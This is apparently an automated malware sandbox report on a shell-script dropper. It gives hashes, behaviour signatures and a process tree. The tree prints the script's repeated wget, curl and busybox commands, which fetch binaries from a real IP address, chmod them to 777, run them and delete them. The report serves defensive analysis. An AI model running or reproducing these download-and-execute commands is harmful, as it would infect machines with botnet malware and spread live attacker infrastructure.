Analysis
-
max time kernel
58s -
max time network
60s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240418-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
18/10/2024, 03:02
Static task
static1
Behavioral task
behavioral1
Sample
edd1fc34eb715fa06f126afd4f715311a15fc1d52df8e3e2f4da70372bc449bc.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
edd1fc34eb715fa06f126afd4f715311a15fc1d52df8e3e2f4da70372bc449bc.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
edd1fc34eb715fa06f126afd4f715311a15fc1d52df8e3e2f4da70372bc449bc.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
edd1fc34eb715fa06f126afd4f715311a15fc1d52df8e3e2f4da70372bc449bc.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
edd1fc34eb715fa06f126afd4f715311a15fc1d52df8e3e2f4da70372bc449bc.sh
-
Size
10KB
-
MD5
8c5495a4b70dcc94500f7181a9826b51
-
SHA1
e9b6f579f9aa552f232b5d99477d13fc078673b8
-
SHA256
edd1fc34eb715fa06f126afd4f715311a15fc1d52df8e3e2f4da70372bc449bc
-
SHA512
bcfc0e62ad7d07abc2d257f1d71feb10c7b88d676d0ab8c87eec62eca6741bb3c1a6f2ed6ff2848c04eda7d894761fbb30a7b7cbd4e9320bf0689496b94aa6ba
-
SSDEEP
96:ojMdujMFHqjMdpMojMkMci+D2uLd0Q/4YAZlx8tlYisYUZVO9NOCbNWFhvUZVO9k:dyHLY0MNWFh0EFh/u
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 961 chmod 973 chmod 991 chmod 757 chmod 832 chmod 855 chmod 907 chmod 913 chmod 763 chmod 880 chmod 997 chmod 901 chmod 931 chmod 937 chmod 925 chmod 943 chmod 967 chmod 985 chmod 815 chmod 826 chmod 886 chmod 955 chmod 874 chmod 785 chmod 949 chmod 895 chmod 919 chmod 979 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E 758 s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT 764 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz 786 MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 816 ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe 827 Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 833 rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu 857 vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g 875 t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq 881 X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 887 sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ 896 hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 902 3wDzYpBDBabysp43dimFTylVEdU479lZE3 /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 908 OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 914 tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq 920 X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 926 rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu 932 vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g 938 t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 944 sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ 950 hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 956 3wDzYpBDBabysp43dimFTylVEdU479lZE3 /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 962 OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 968 tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe 974 Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E 980 s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT 986 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz 992 MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 998 ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu curl File opened for modification /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 curl File opened for modification /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 curl File opened for modification /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 curl File opened for modification /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g curl File opened for modification /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 curl File opened for modification /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 curl File opened for modification /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT curl File opened for modification /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 curl File opened for modification /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 curl File opened for modification /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ curl File opened for modification /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ curl File opened for modification /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E curl File opened for modification /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 curl File opened for modification /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz curl File opened for modification /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E curl File opened for modification /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz curl File opened for modification /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 curl File opened for modification /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 curl File opened for modification /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe curl File opened for modification /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq curl File opened for modification /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 curl File opened for modification /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu curl File opened for modification /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g curl File opened for modification /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq curl File opened for modification /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 curl File opened for modification /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT curl File opened for modification /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe curl
Processes
-
/tmp/edd1fc34eb715fa06f126afd4f715311a15fc1d52df8e3e2f4da70372bc449bc.sh/tmp/edd1fc34eb715fa06f126afd4f715311a15fc1d52df8e3e2f4da70372bc449bc.sh1⤵PID:727
-
/bin/rm/bin/rm bins.sh2⤵PID:731
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵PID:735
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:742
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵PID:756
-
-
/bin/chmodchmod 777 s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵
- File and Directory Permissions Modification
PID:757
-
-
/tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E./s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵
- Executes dropped EXE
PID:758
-
-
/bin/rmrm s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵PID:759
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵PID:760
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:761
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵PID:762
-
-
/bin/chmodchmod 777 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵
- File and Directory Permissions Modification
PID:763
-
-
/tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT./1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵
- Executes dropped EXE
PID:764
-
-
/bin/rmrm 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵PID:765
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵PID:766
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:774
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵PID:782
-
-
/bin/chmodchmod 777 MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵
- File and Directory Permissions Modification
PID:785
-
-
/tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz./MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵
- Executes dropped EXE
PID:786
-
-
/bin/rmrm MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵PID:790
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵PID:791
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵
- Reads runtime system information
- Writes file to tmp directory
PID:797
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵PID:812
-
-
/bin/chmodchmod 777 ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵
- File and Directory Permissions Modification
PID:815
-
-
/tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319./ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵
- Executes dropped EXE
PID:816
-
-
/bin/rmrm ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵PID:820
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵PID:821
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:824
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵PID:825
-
-
/bin/chmodchmod 777 Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵
- File and Directory Permissions Modification
PID:826
-
-
/tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe./Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵
- Executes dropped EXE
PID:827
-
-
/bin/rmrm Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵PID:828
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx942⤵PID:829
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx942⤵
- Reads runtime system information
- Writes file to tmp directory
PID:830
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx942⤵PID:831
-
-
/bin/chmodchmod 777 rGTehcLKVpg2vtJK516OMVl8rBYl3wPx942⤵
- File and Directory Permissions Modification
PID:832
-
-
/tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94./rGTehcLKVpg2vtJK516OMVl8rBYl3wPx942⤵
- Executes dropped EXE
PID:833
-
-
/bin/rmrm rGTehcLKVpg2vtJK516OMVl8rBYl3wPx942⤵PID:836
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu2⤵PID:838
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:844
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu2⤵PID:851
-
-
/bin/chmodchmod 777 vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu2⤵
- File and Directory Permissions Modification
PID:855
-
-
/tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu./vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu2⤵
- Executes dropped EXE
PID:857
-
-
/bin/rmrm vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu2⤵PID:860
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g2⤵PID:861
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:866
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g2⤵PID:873
-
-
/bin/chmodchmod 777 t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g./t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g2⤵PID:876
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq2⤵PID:877
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq2⤵PID:879
-
-
/bin/chmodchmod 777 X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq./X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq2⤵PID:882
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug122⤵PID:883
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug122⤵
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug122⤵PID:885
-
-
/bin/chmodchmod 777 sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug122⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12./sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug122⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug122⤵PID:888
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ2⤵PID:889
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ2⤵PID:894
-
-
/bin/chmodchmod 777 hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ./hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ2⤵PID:897
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE32⤵PID:898
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE32⤵
- Reads runtime system information
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE32⤵PID:900
-
-
/bin/chmodchmod 777 3wDzYpBDBabysp43dimFTylVEdU479lZE32⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3./3wDzYpBDBabysp43dimFTylVEdU479lZE32⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm 3wDzYpBDBabysp43dimFTylVEdU479lZE32⤵PID:903
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ02⤵PID:904
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ02⤵PID:906
-
-
/bin/chmodchmod 777 OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ02⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0./OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ02⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ02⤵PID:909
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt62⤵PID:910
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt62⤵PID:912
-
-
/bin/chmodchmod 777 tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt62⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6./tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt62⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt62⤵PID:915
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq2⤵PID:916
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq2⤵PID:918
-
-
/bin/chmodchmod 777 X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq./X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq2⤵PID:921
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx942⤵PID:922
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx942⤵
- Reads runtime system information
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx942⤵PID:924
-
-
/bin/chmodchmod 777 rGTehcLKVpg2vtJK516OMVl8rBYl3wPx942⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94./rGTehcLKVpg2vtJK516OMVl8rBYl3wPx942⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm rGTehcLKVpg2vtJK516OMVl8rBYl3wPx942⤵PID:927
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu2⤵PID:928
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu2⤵PID:930
-
-
/bin/chmodchmod 777 vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu2⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu./vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu2⤵
- Executes dropped EXE
PID:932
-
-
/bin/rmrm vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu2⤵PID:933
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g2⤵PID:934
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g2⤵PID:936
-
-
/bin/chmodchmod 777 t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g2⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g./t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g2⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g2⤵PID:939
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug122⤵PID:940
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug122⤵
- Reads runtime system information
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug122⤵PID:942
-
-
/bin/chmodchmod 777 sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug122⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12./sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug122⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug122⤵PID:945
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ2⤵PID:946
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ2⤵PID:948
-
-
/bin/chmodchmod 777 hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ2⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ./hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ2⤵
- Executes dropped EXE
PID:950
-
-
/bin/rmrm hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ2⤵PID:951
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE32⤵PID:952
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE32⤵
- Reads runtime system information
- Writes file to tmp directory
PID:953
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE32⤵PID:954
-
-
/bin/chmodchmod 777 3wDzYpBDBabysp43dimFTylVEdU479lZE32⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3./3wDzYpBDBabysp43dimFTylVEdU479lZE32⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm 3wDzYpBDBabysp43dimFTylVEdU479lZE32⤵PID:957
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ02⤵PID:958
-
-
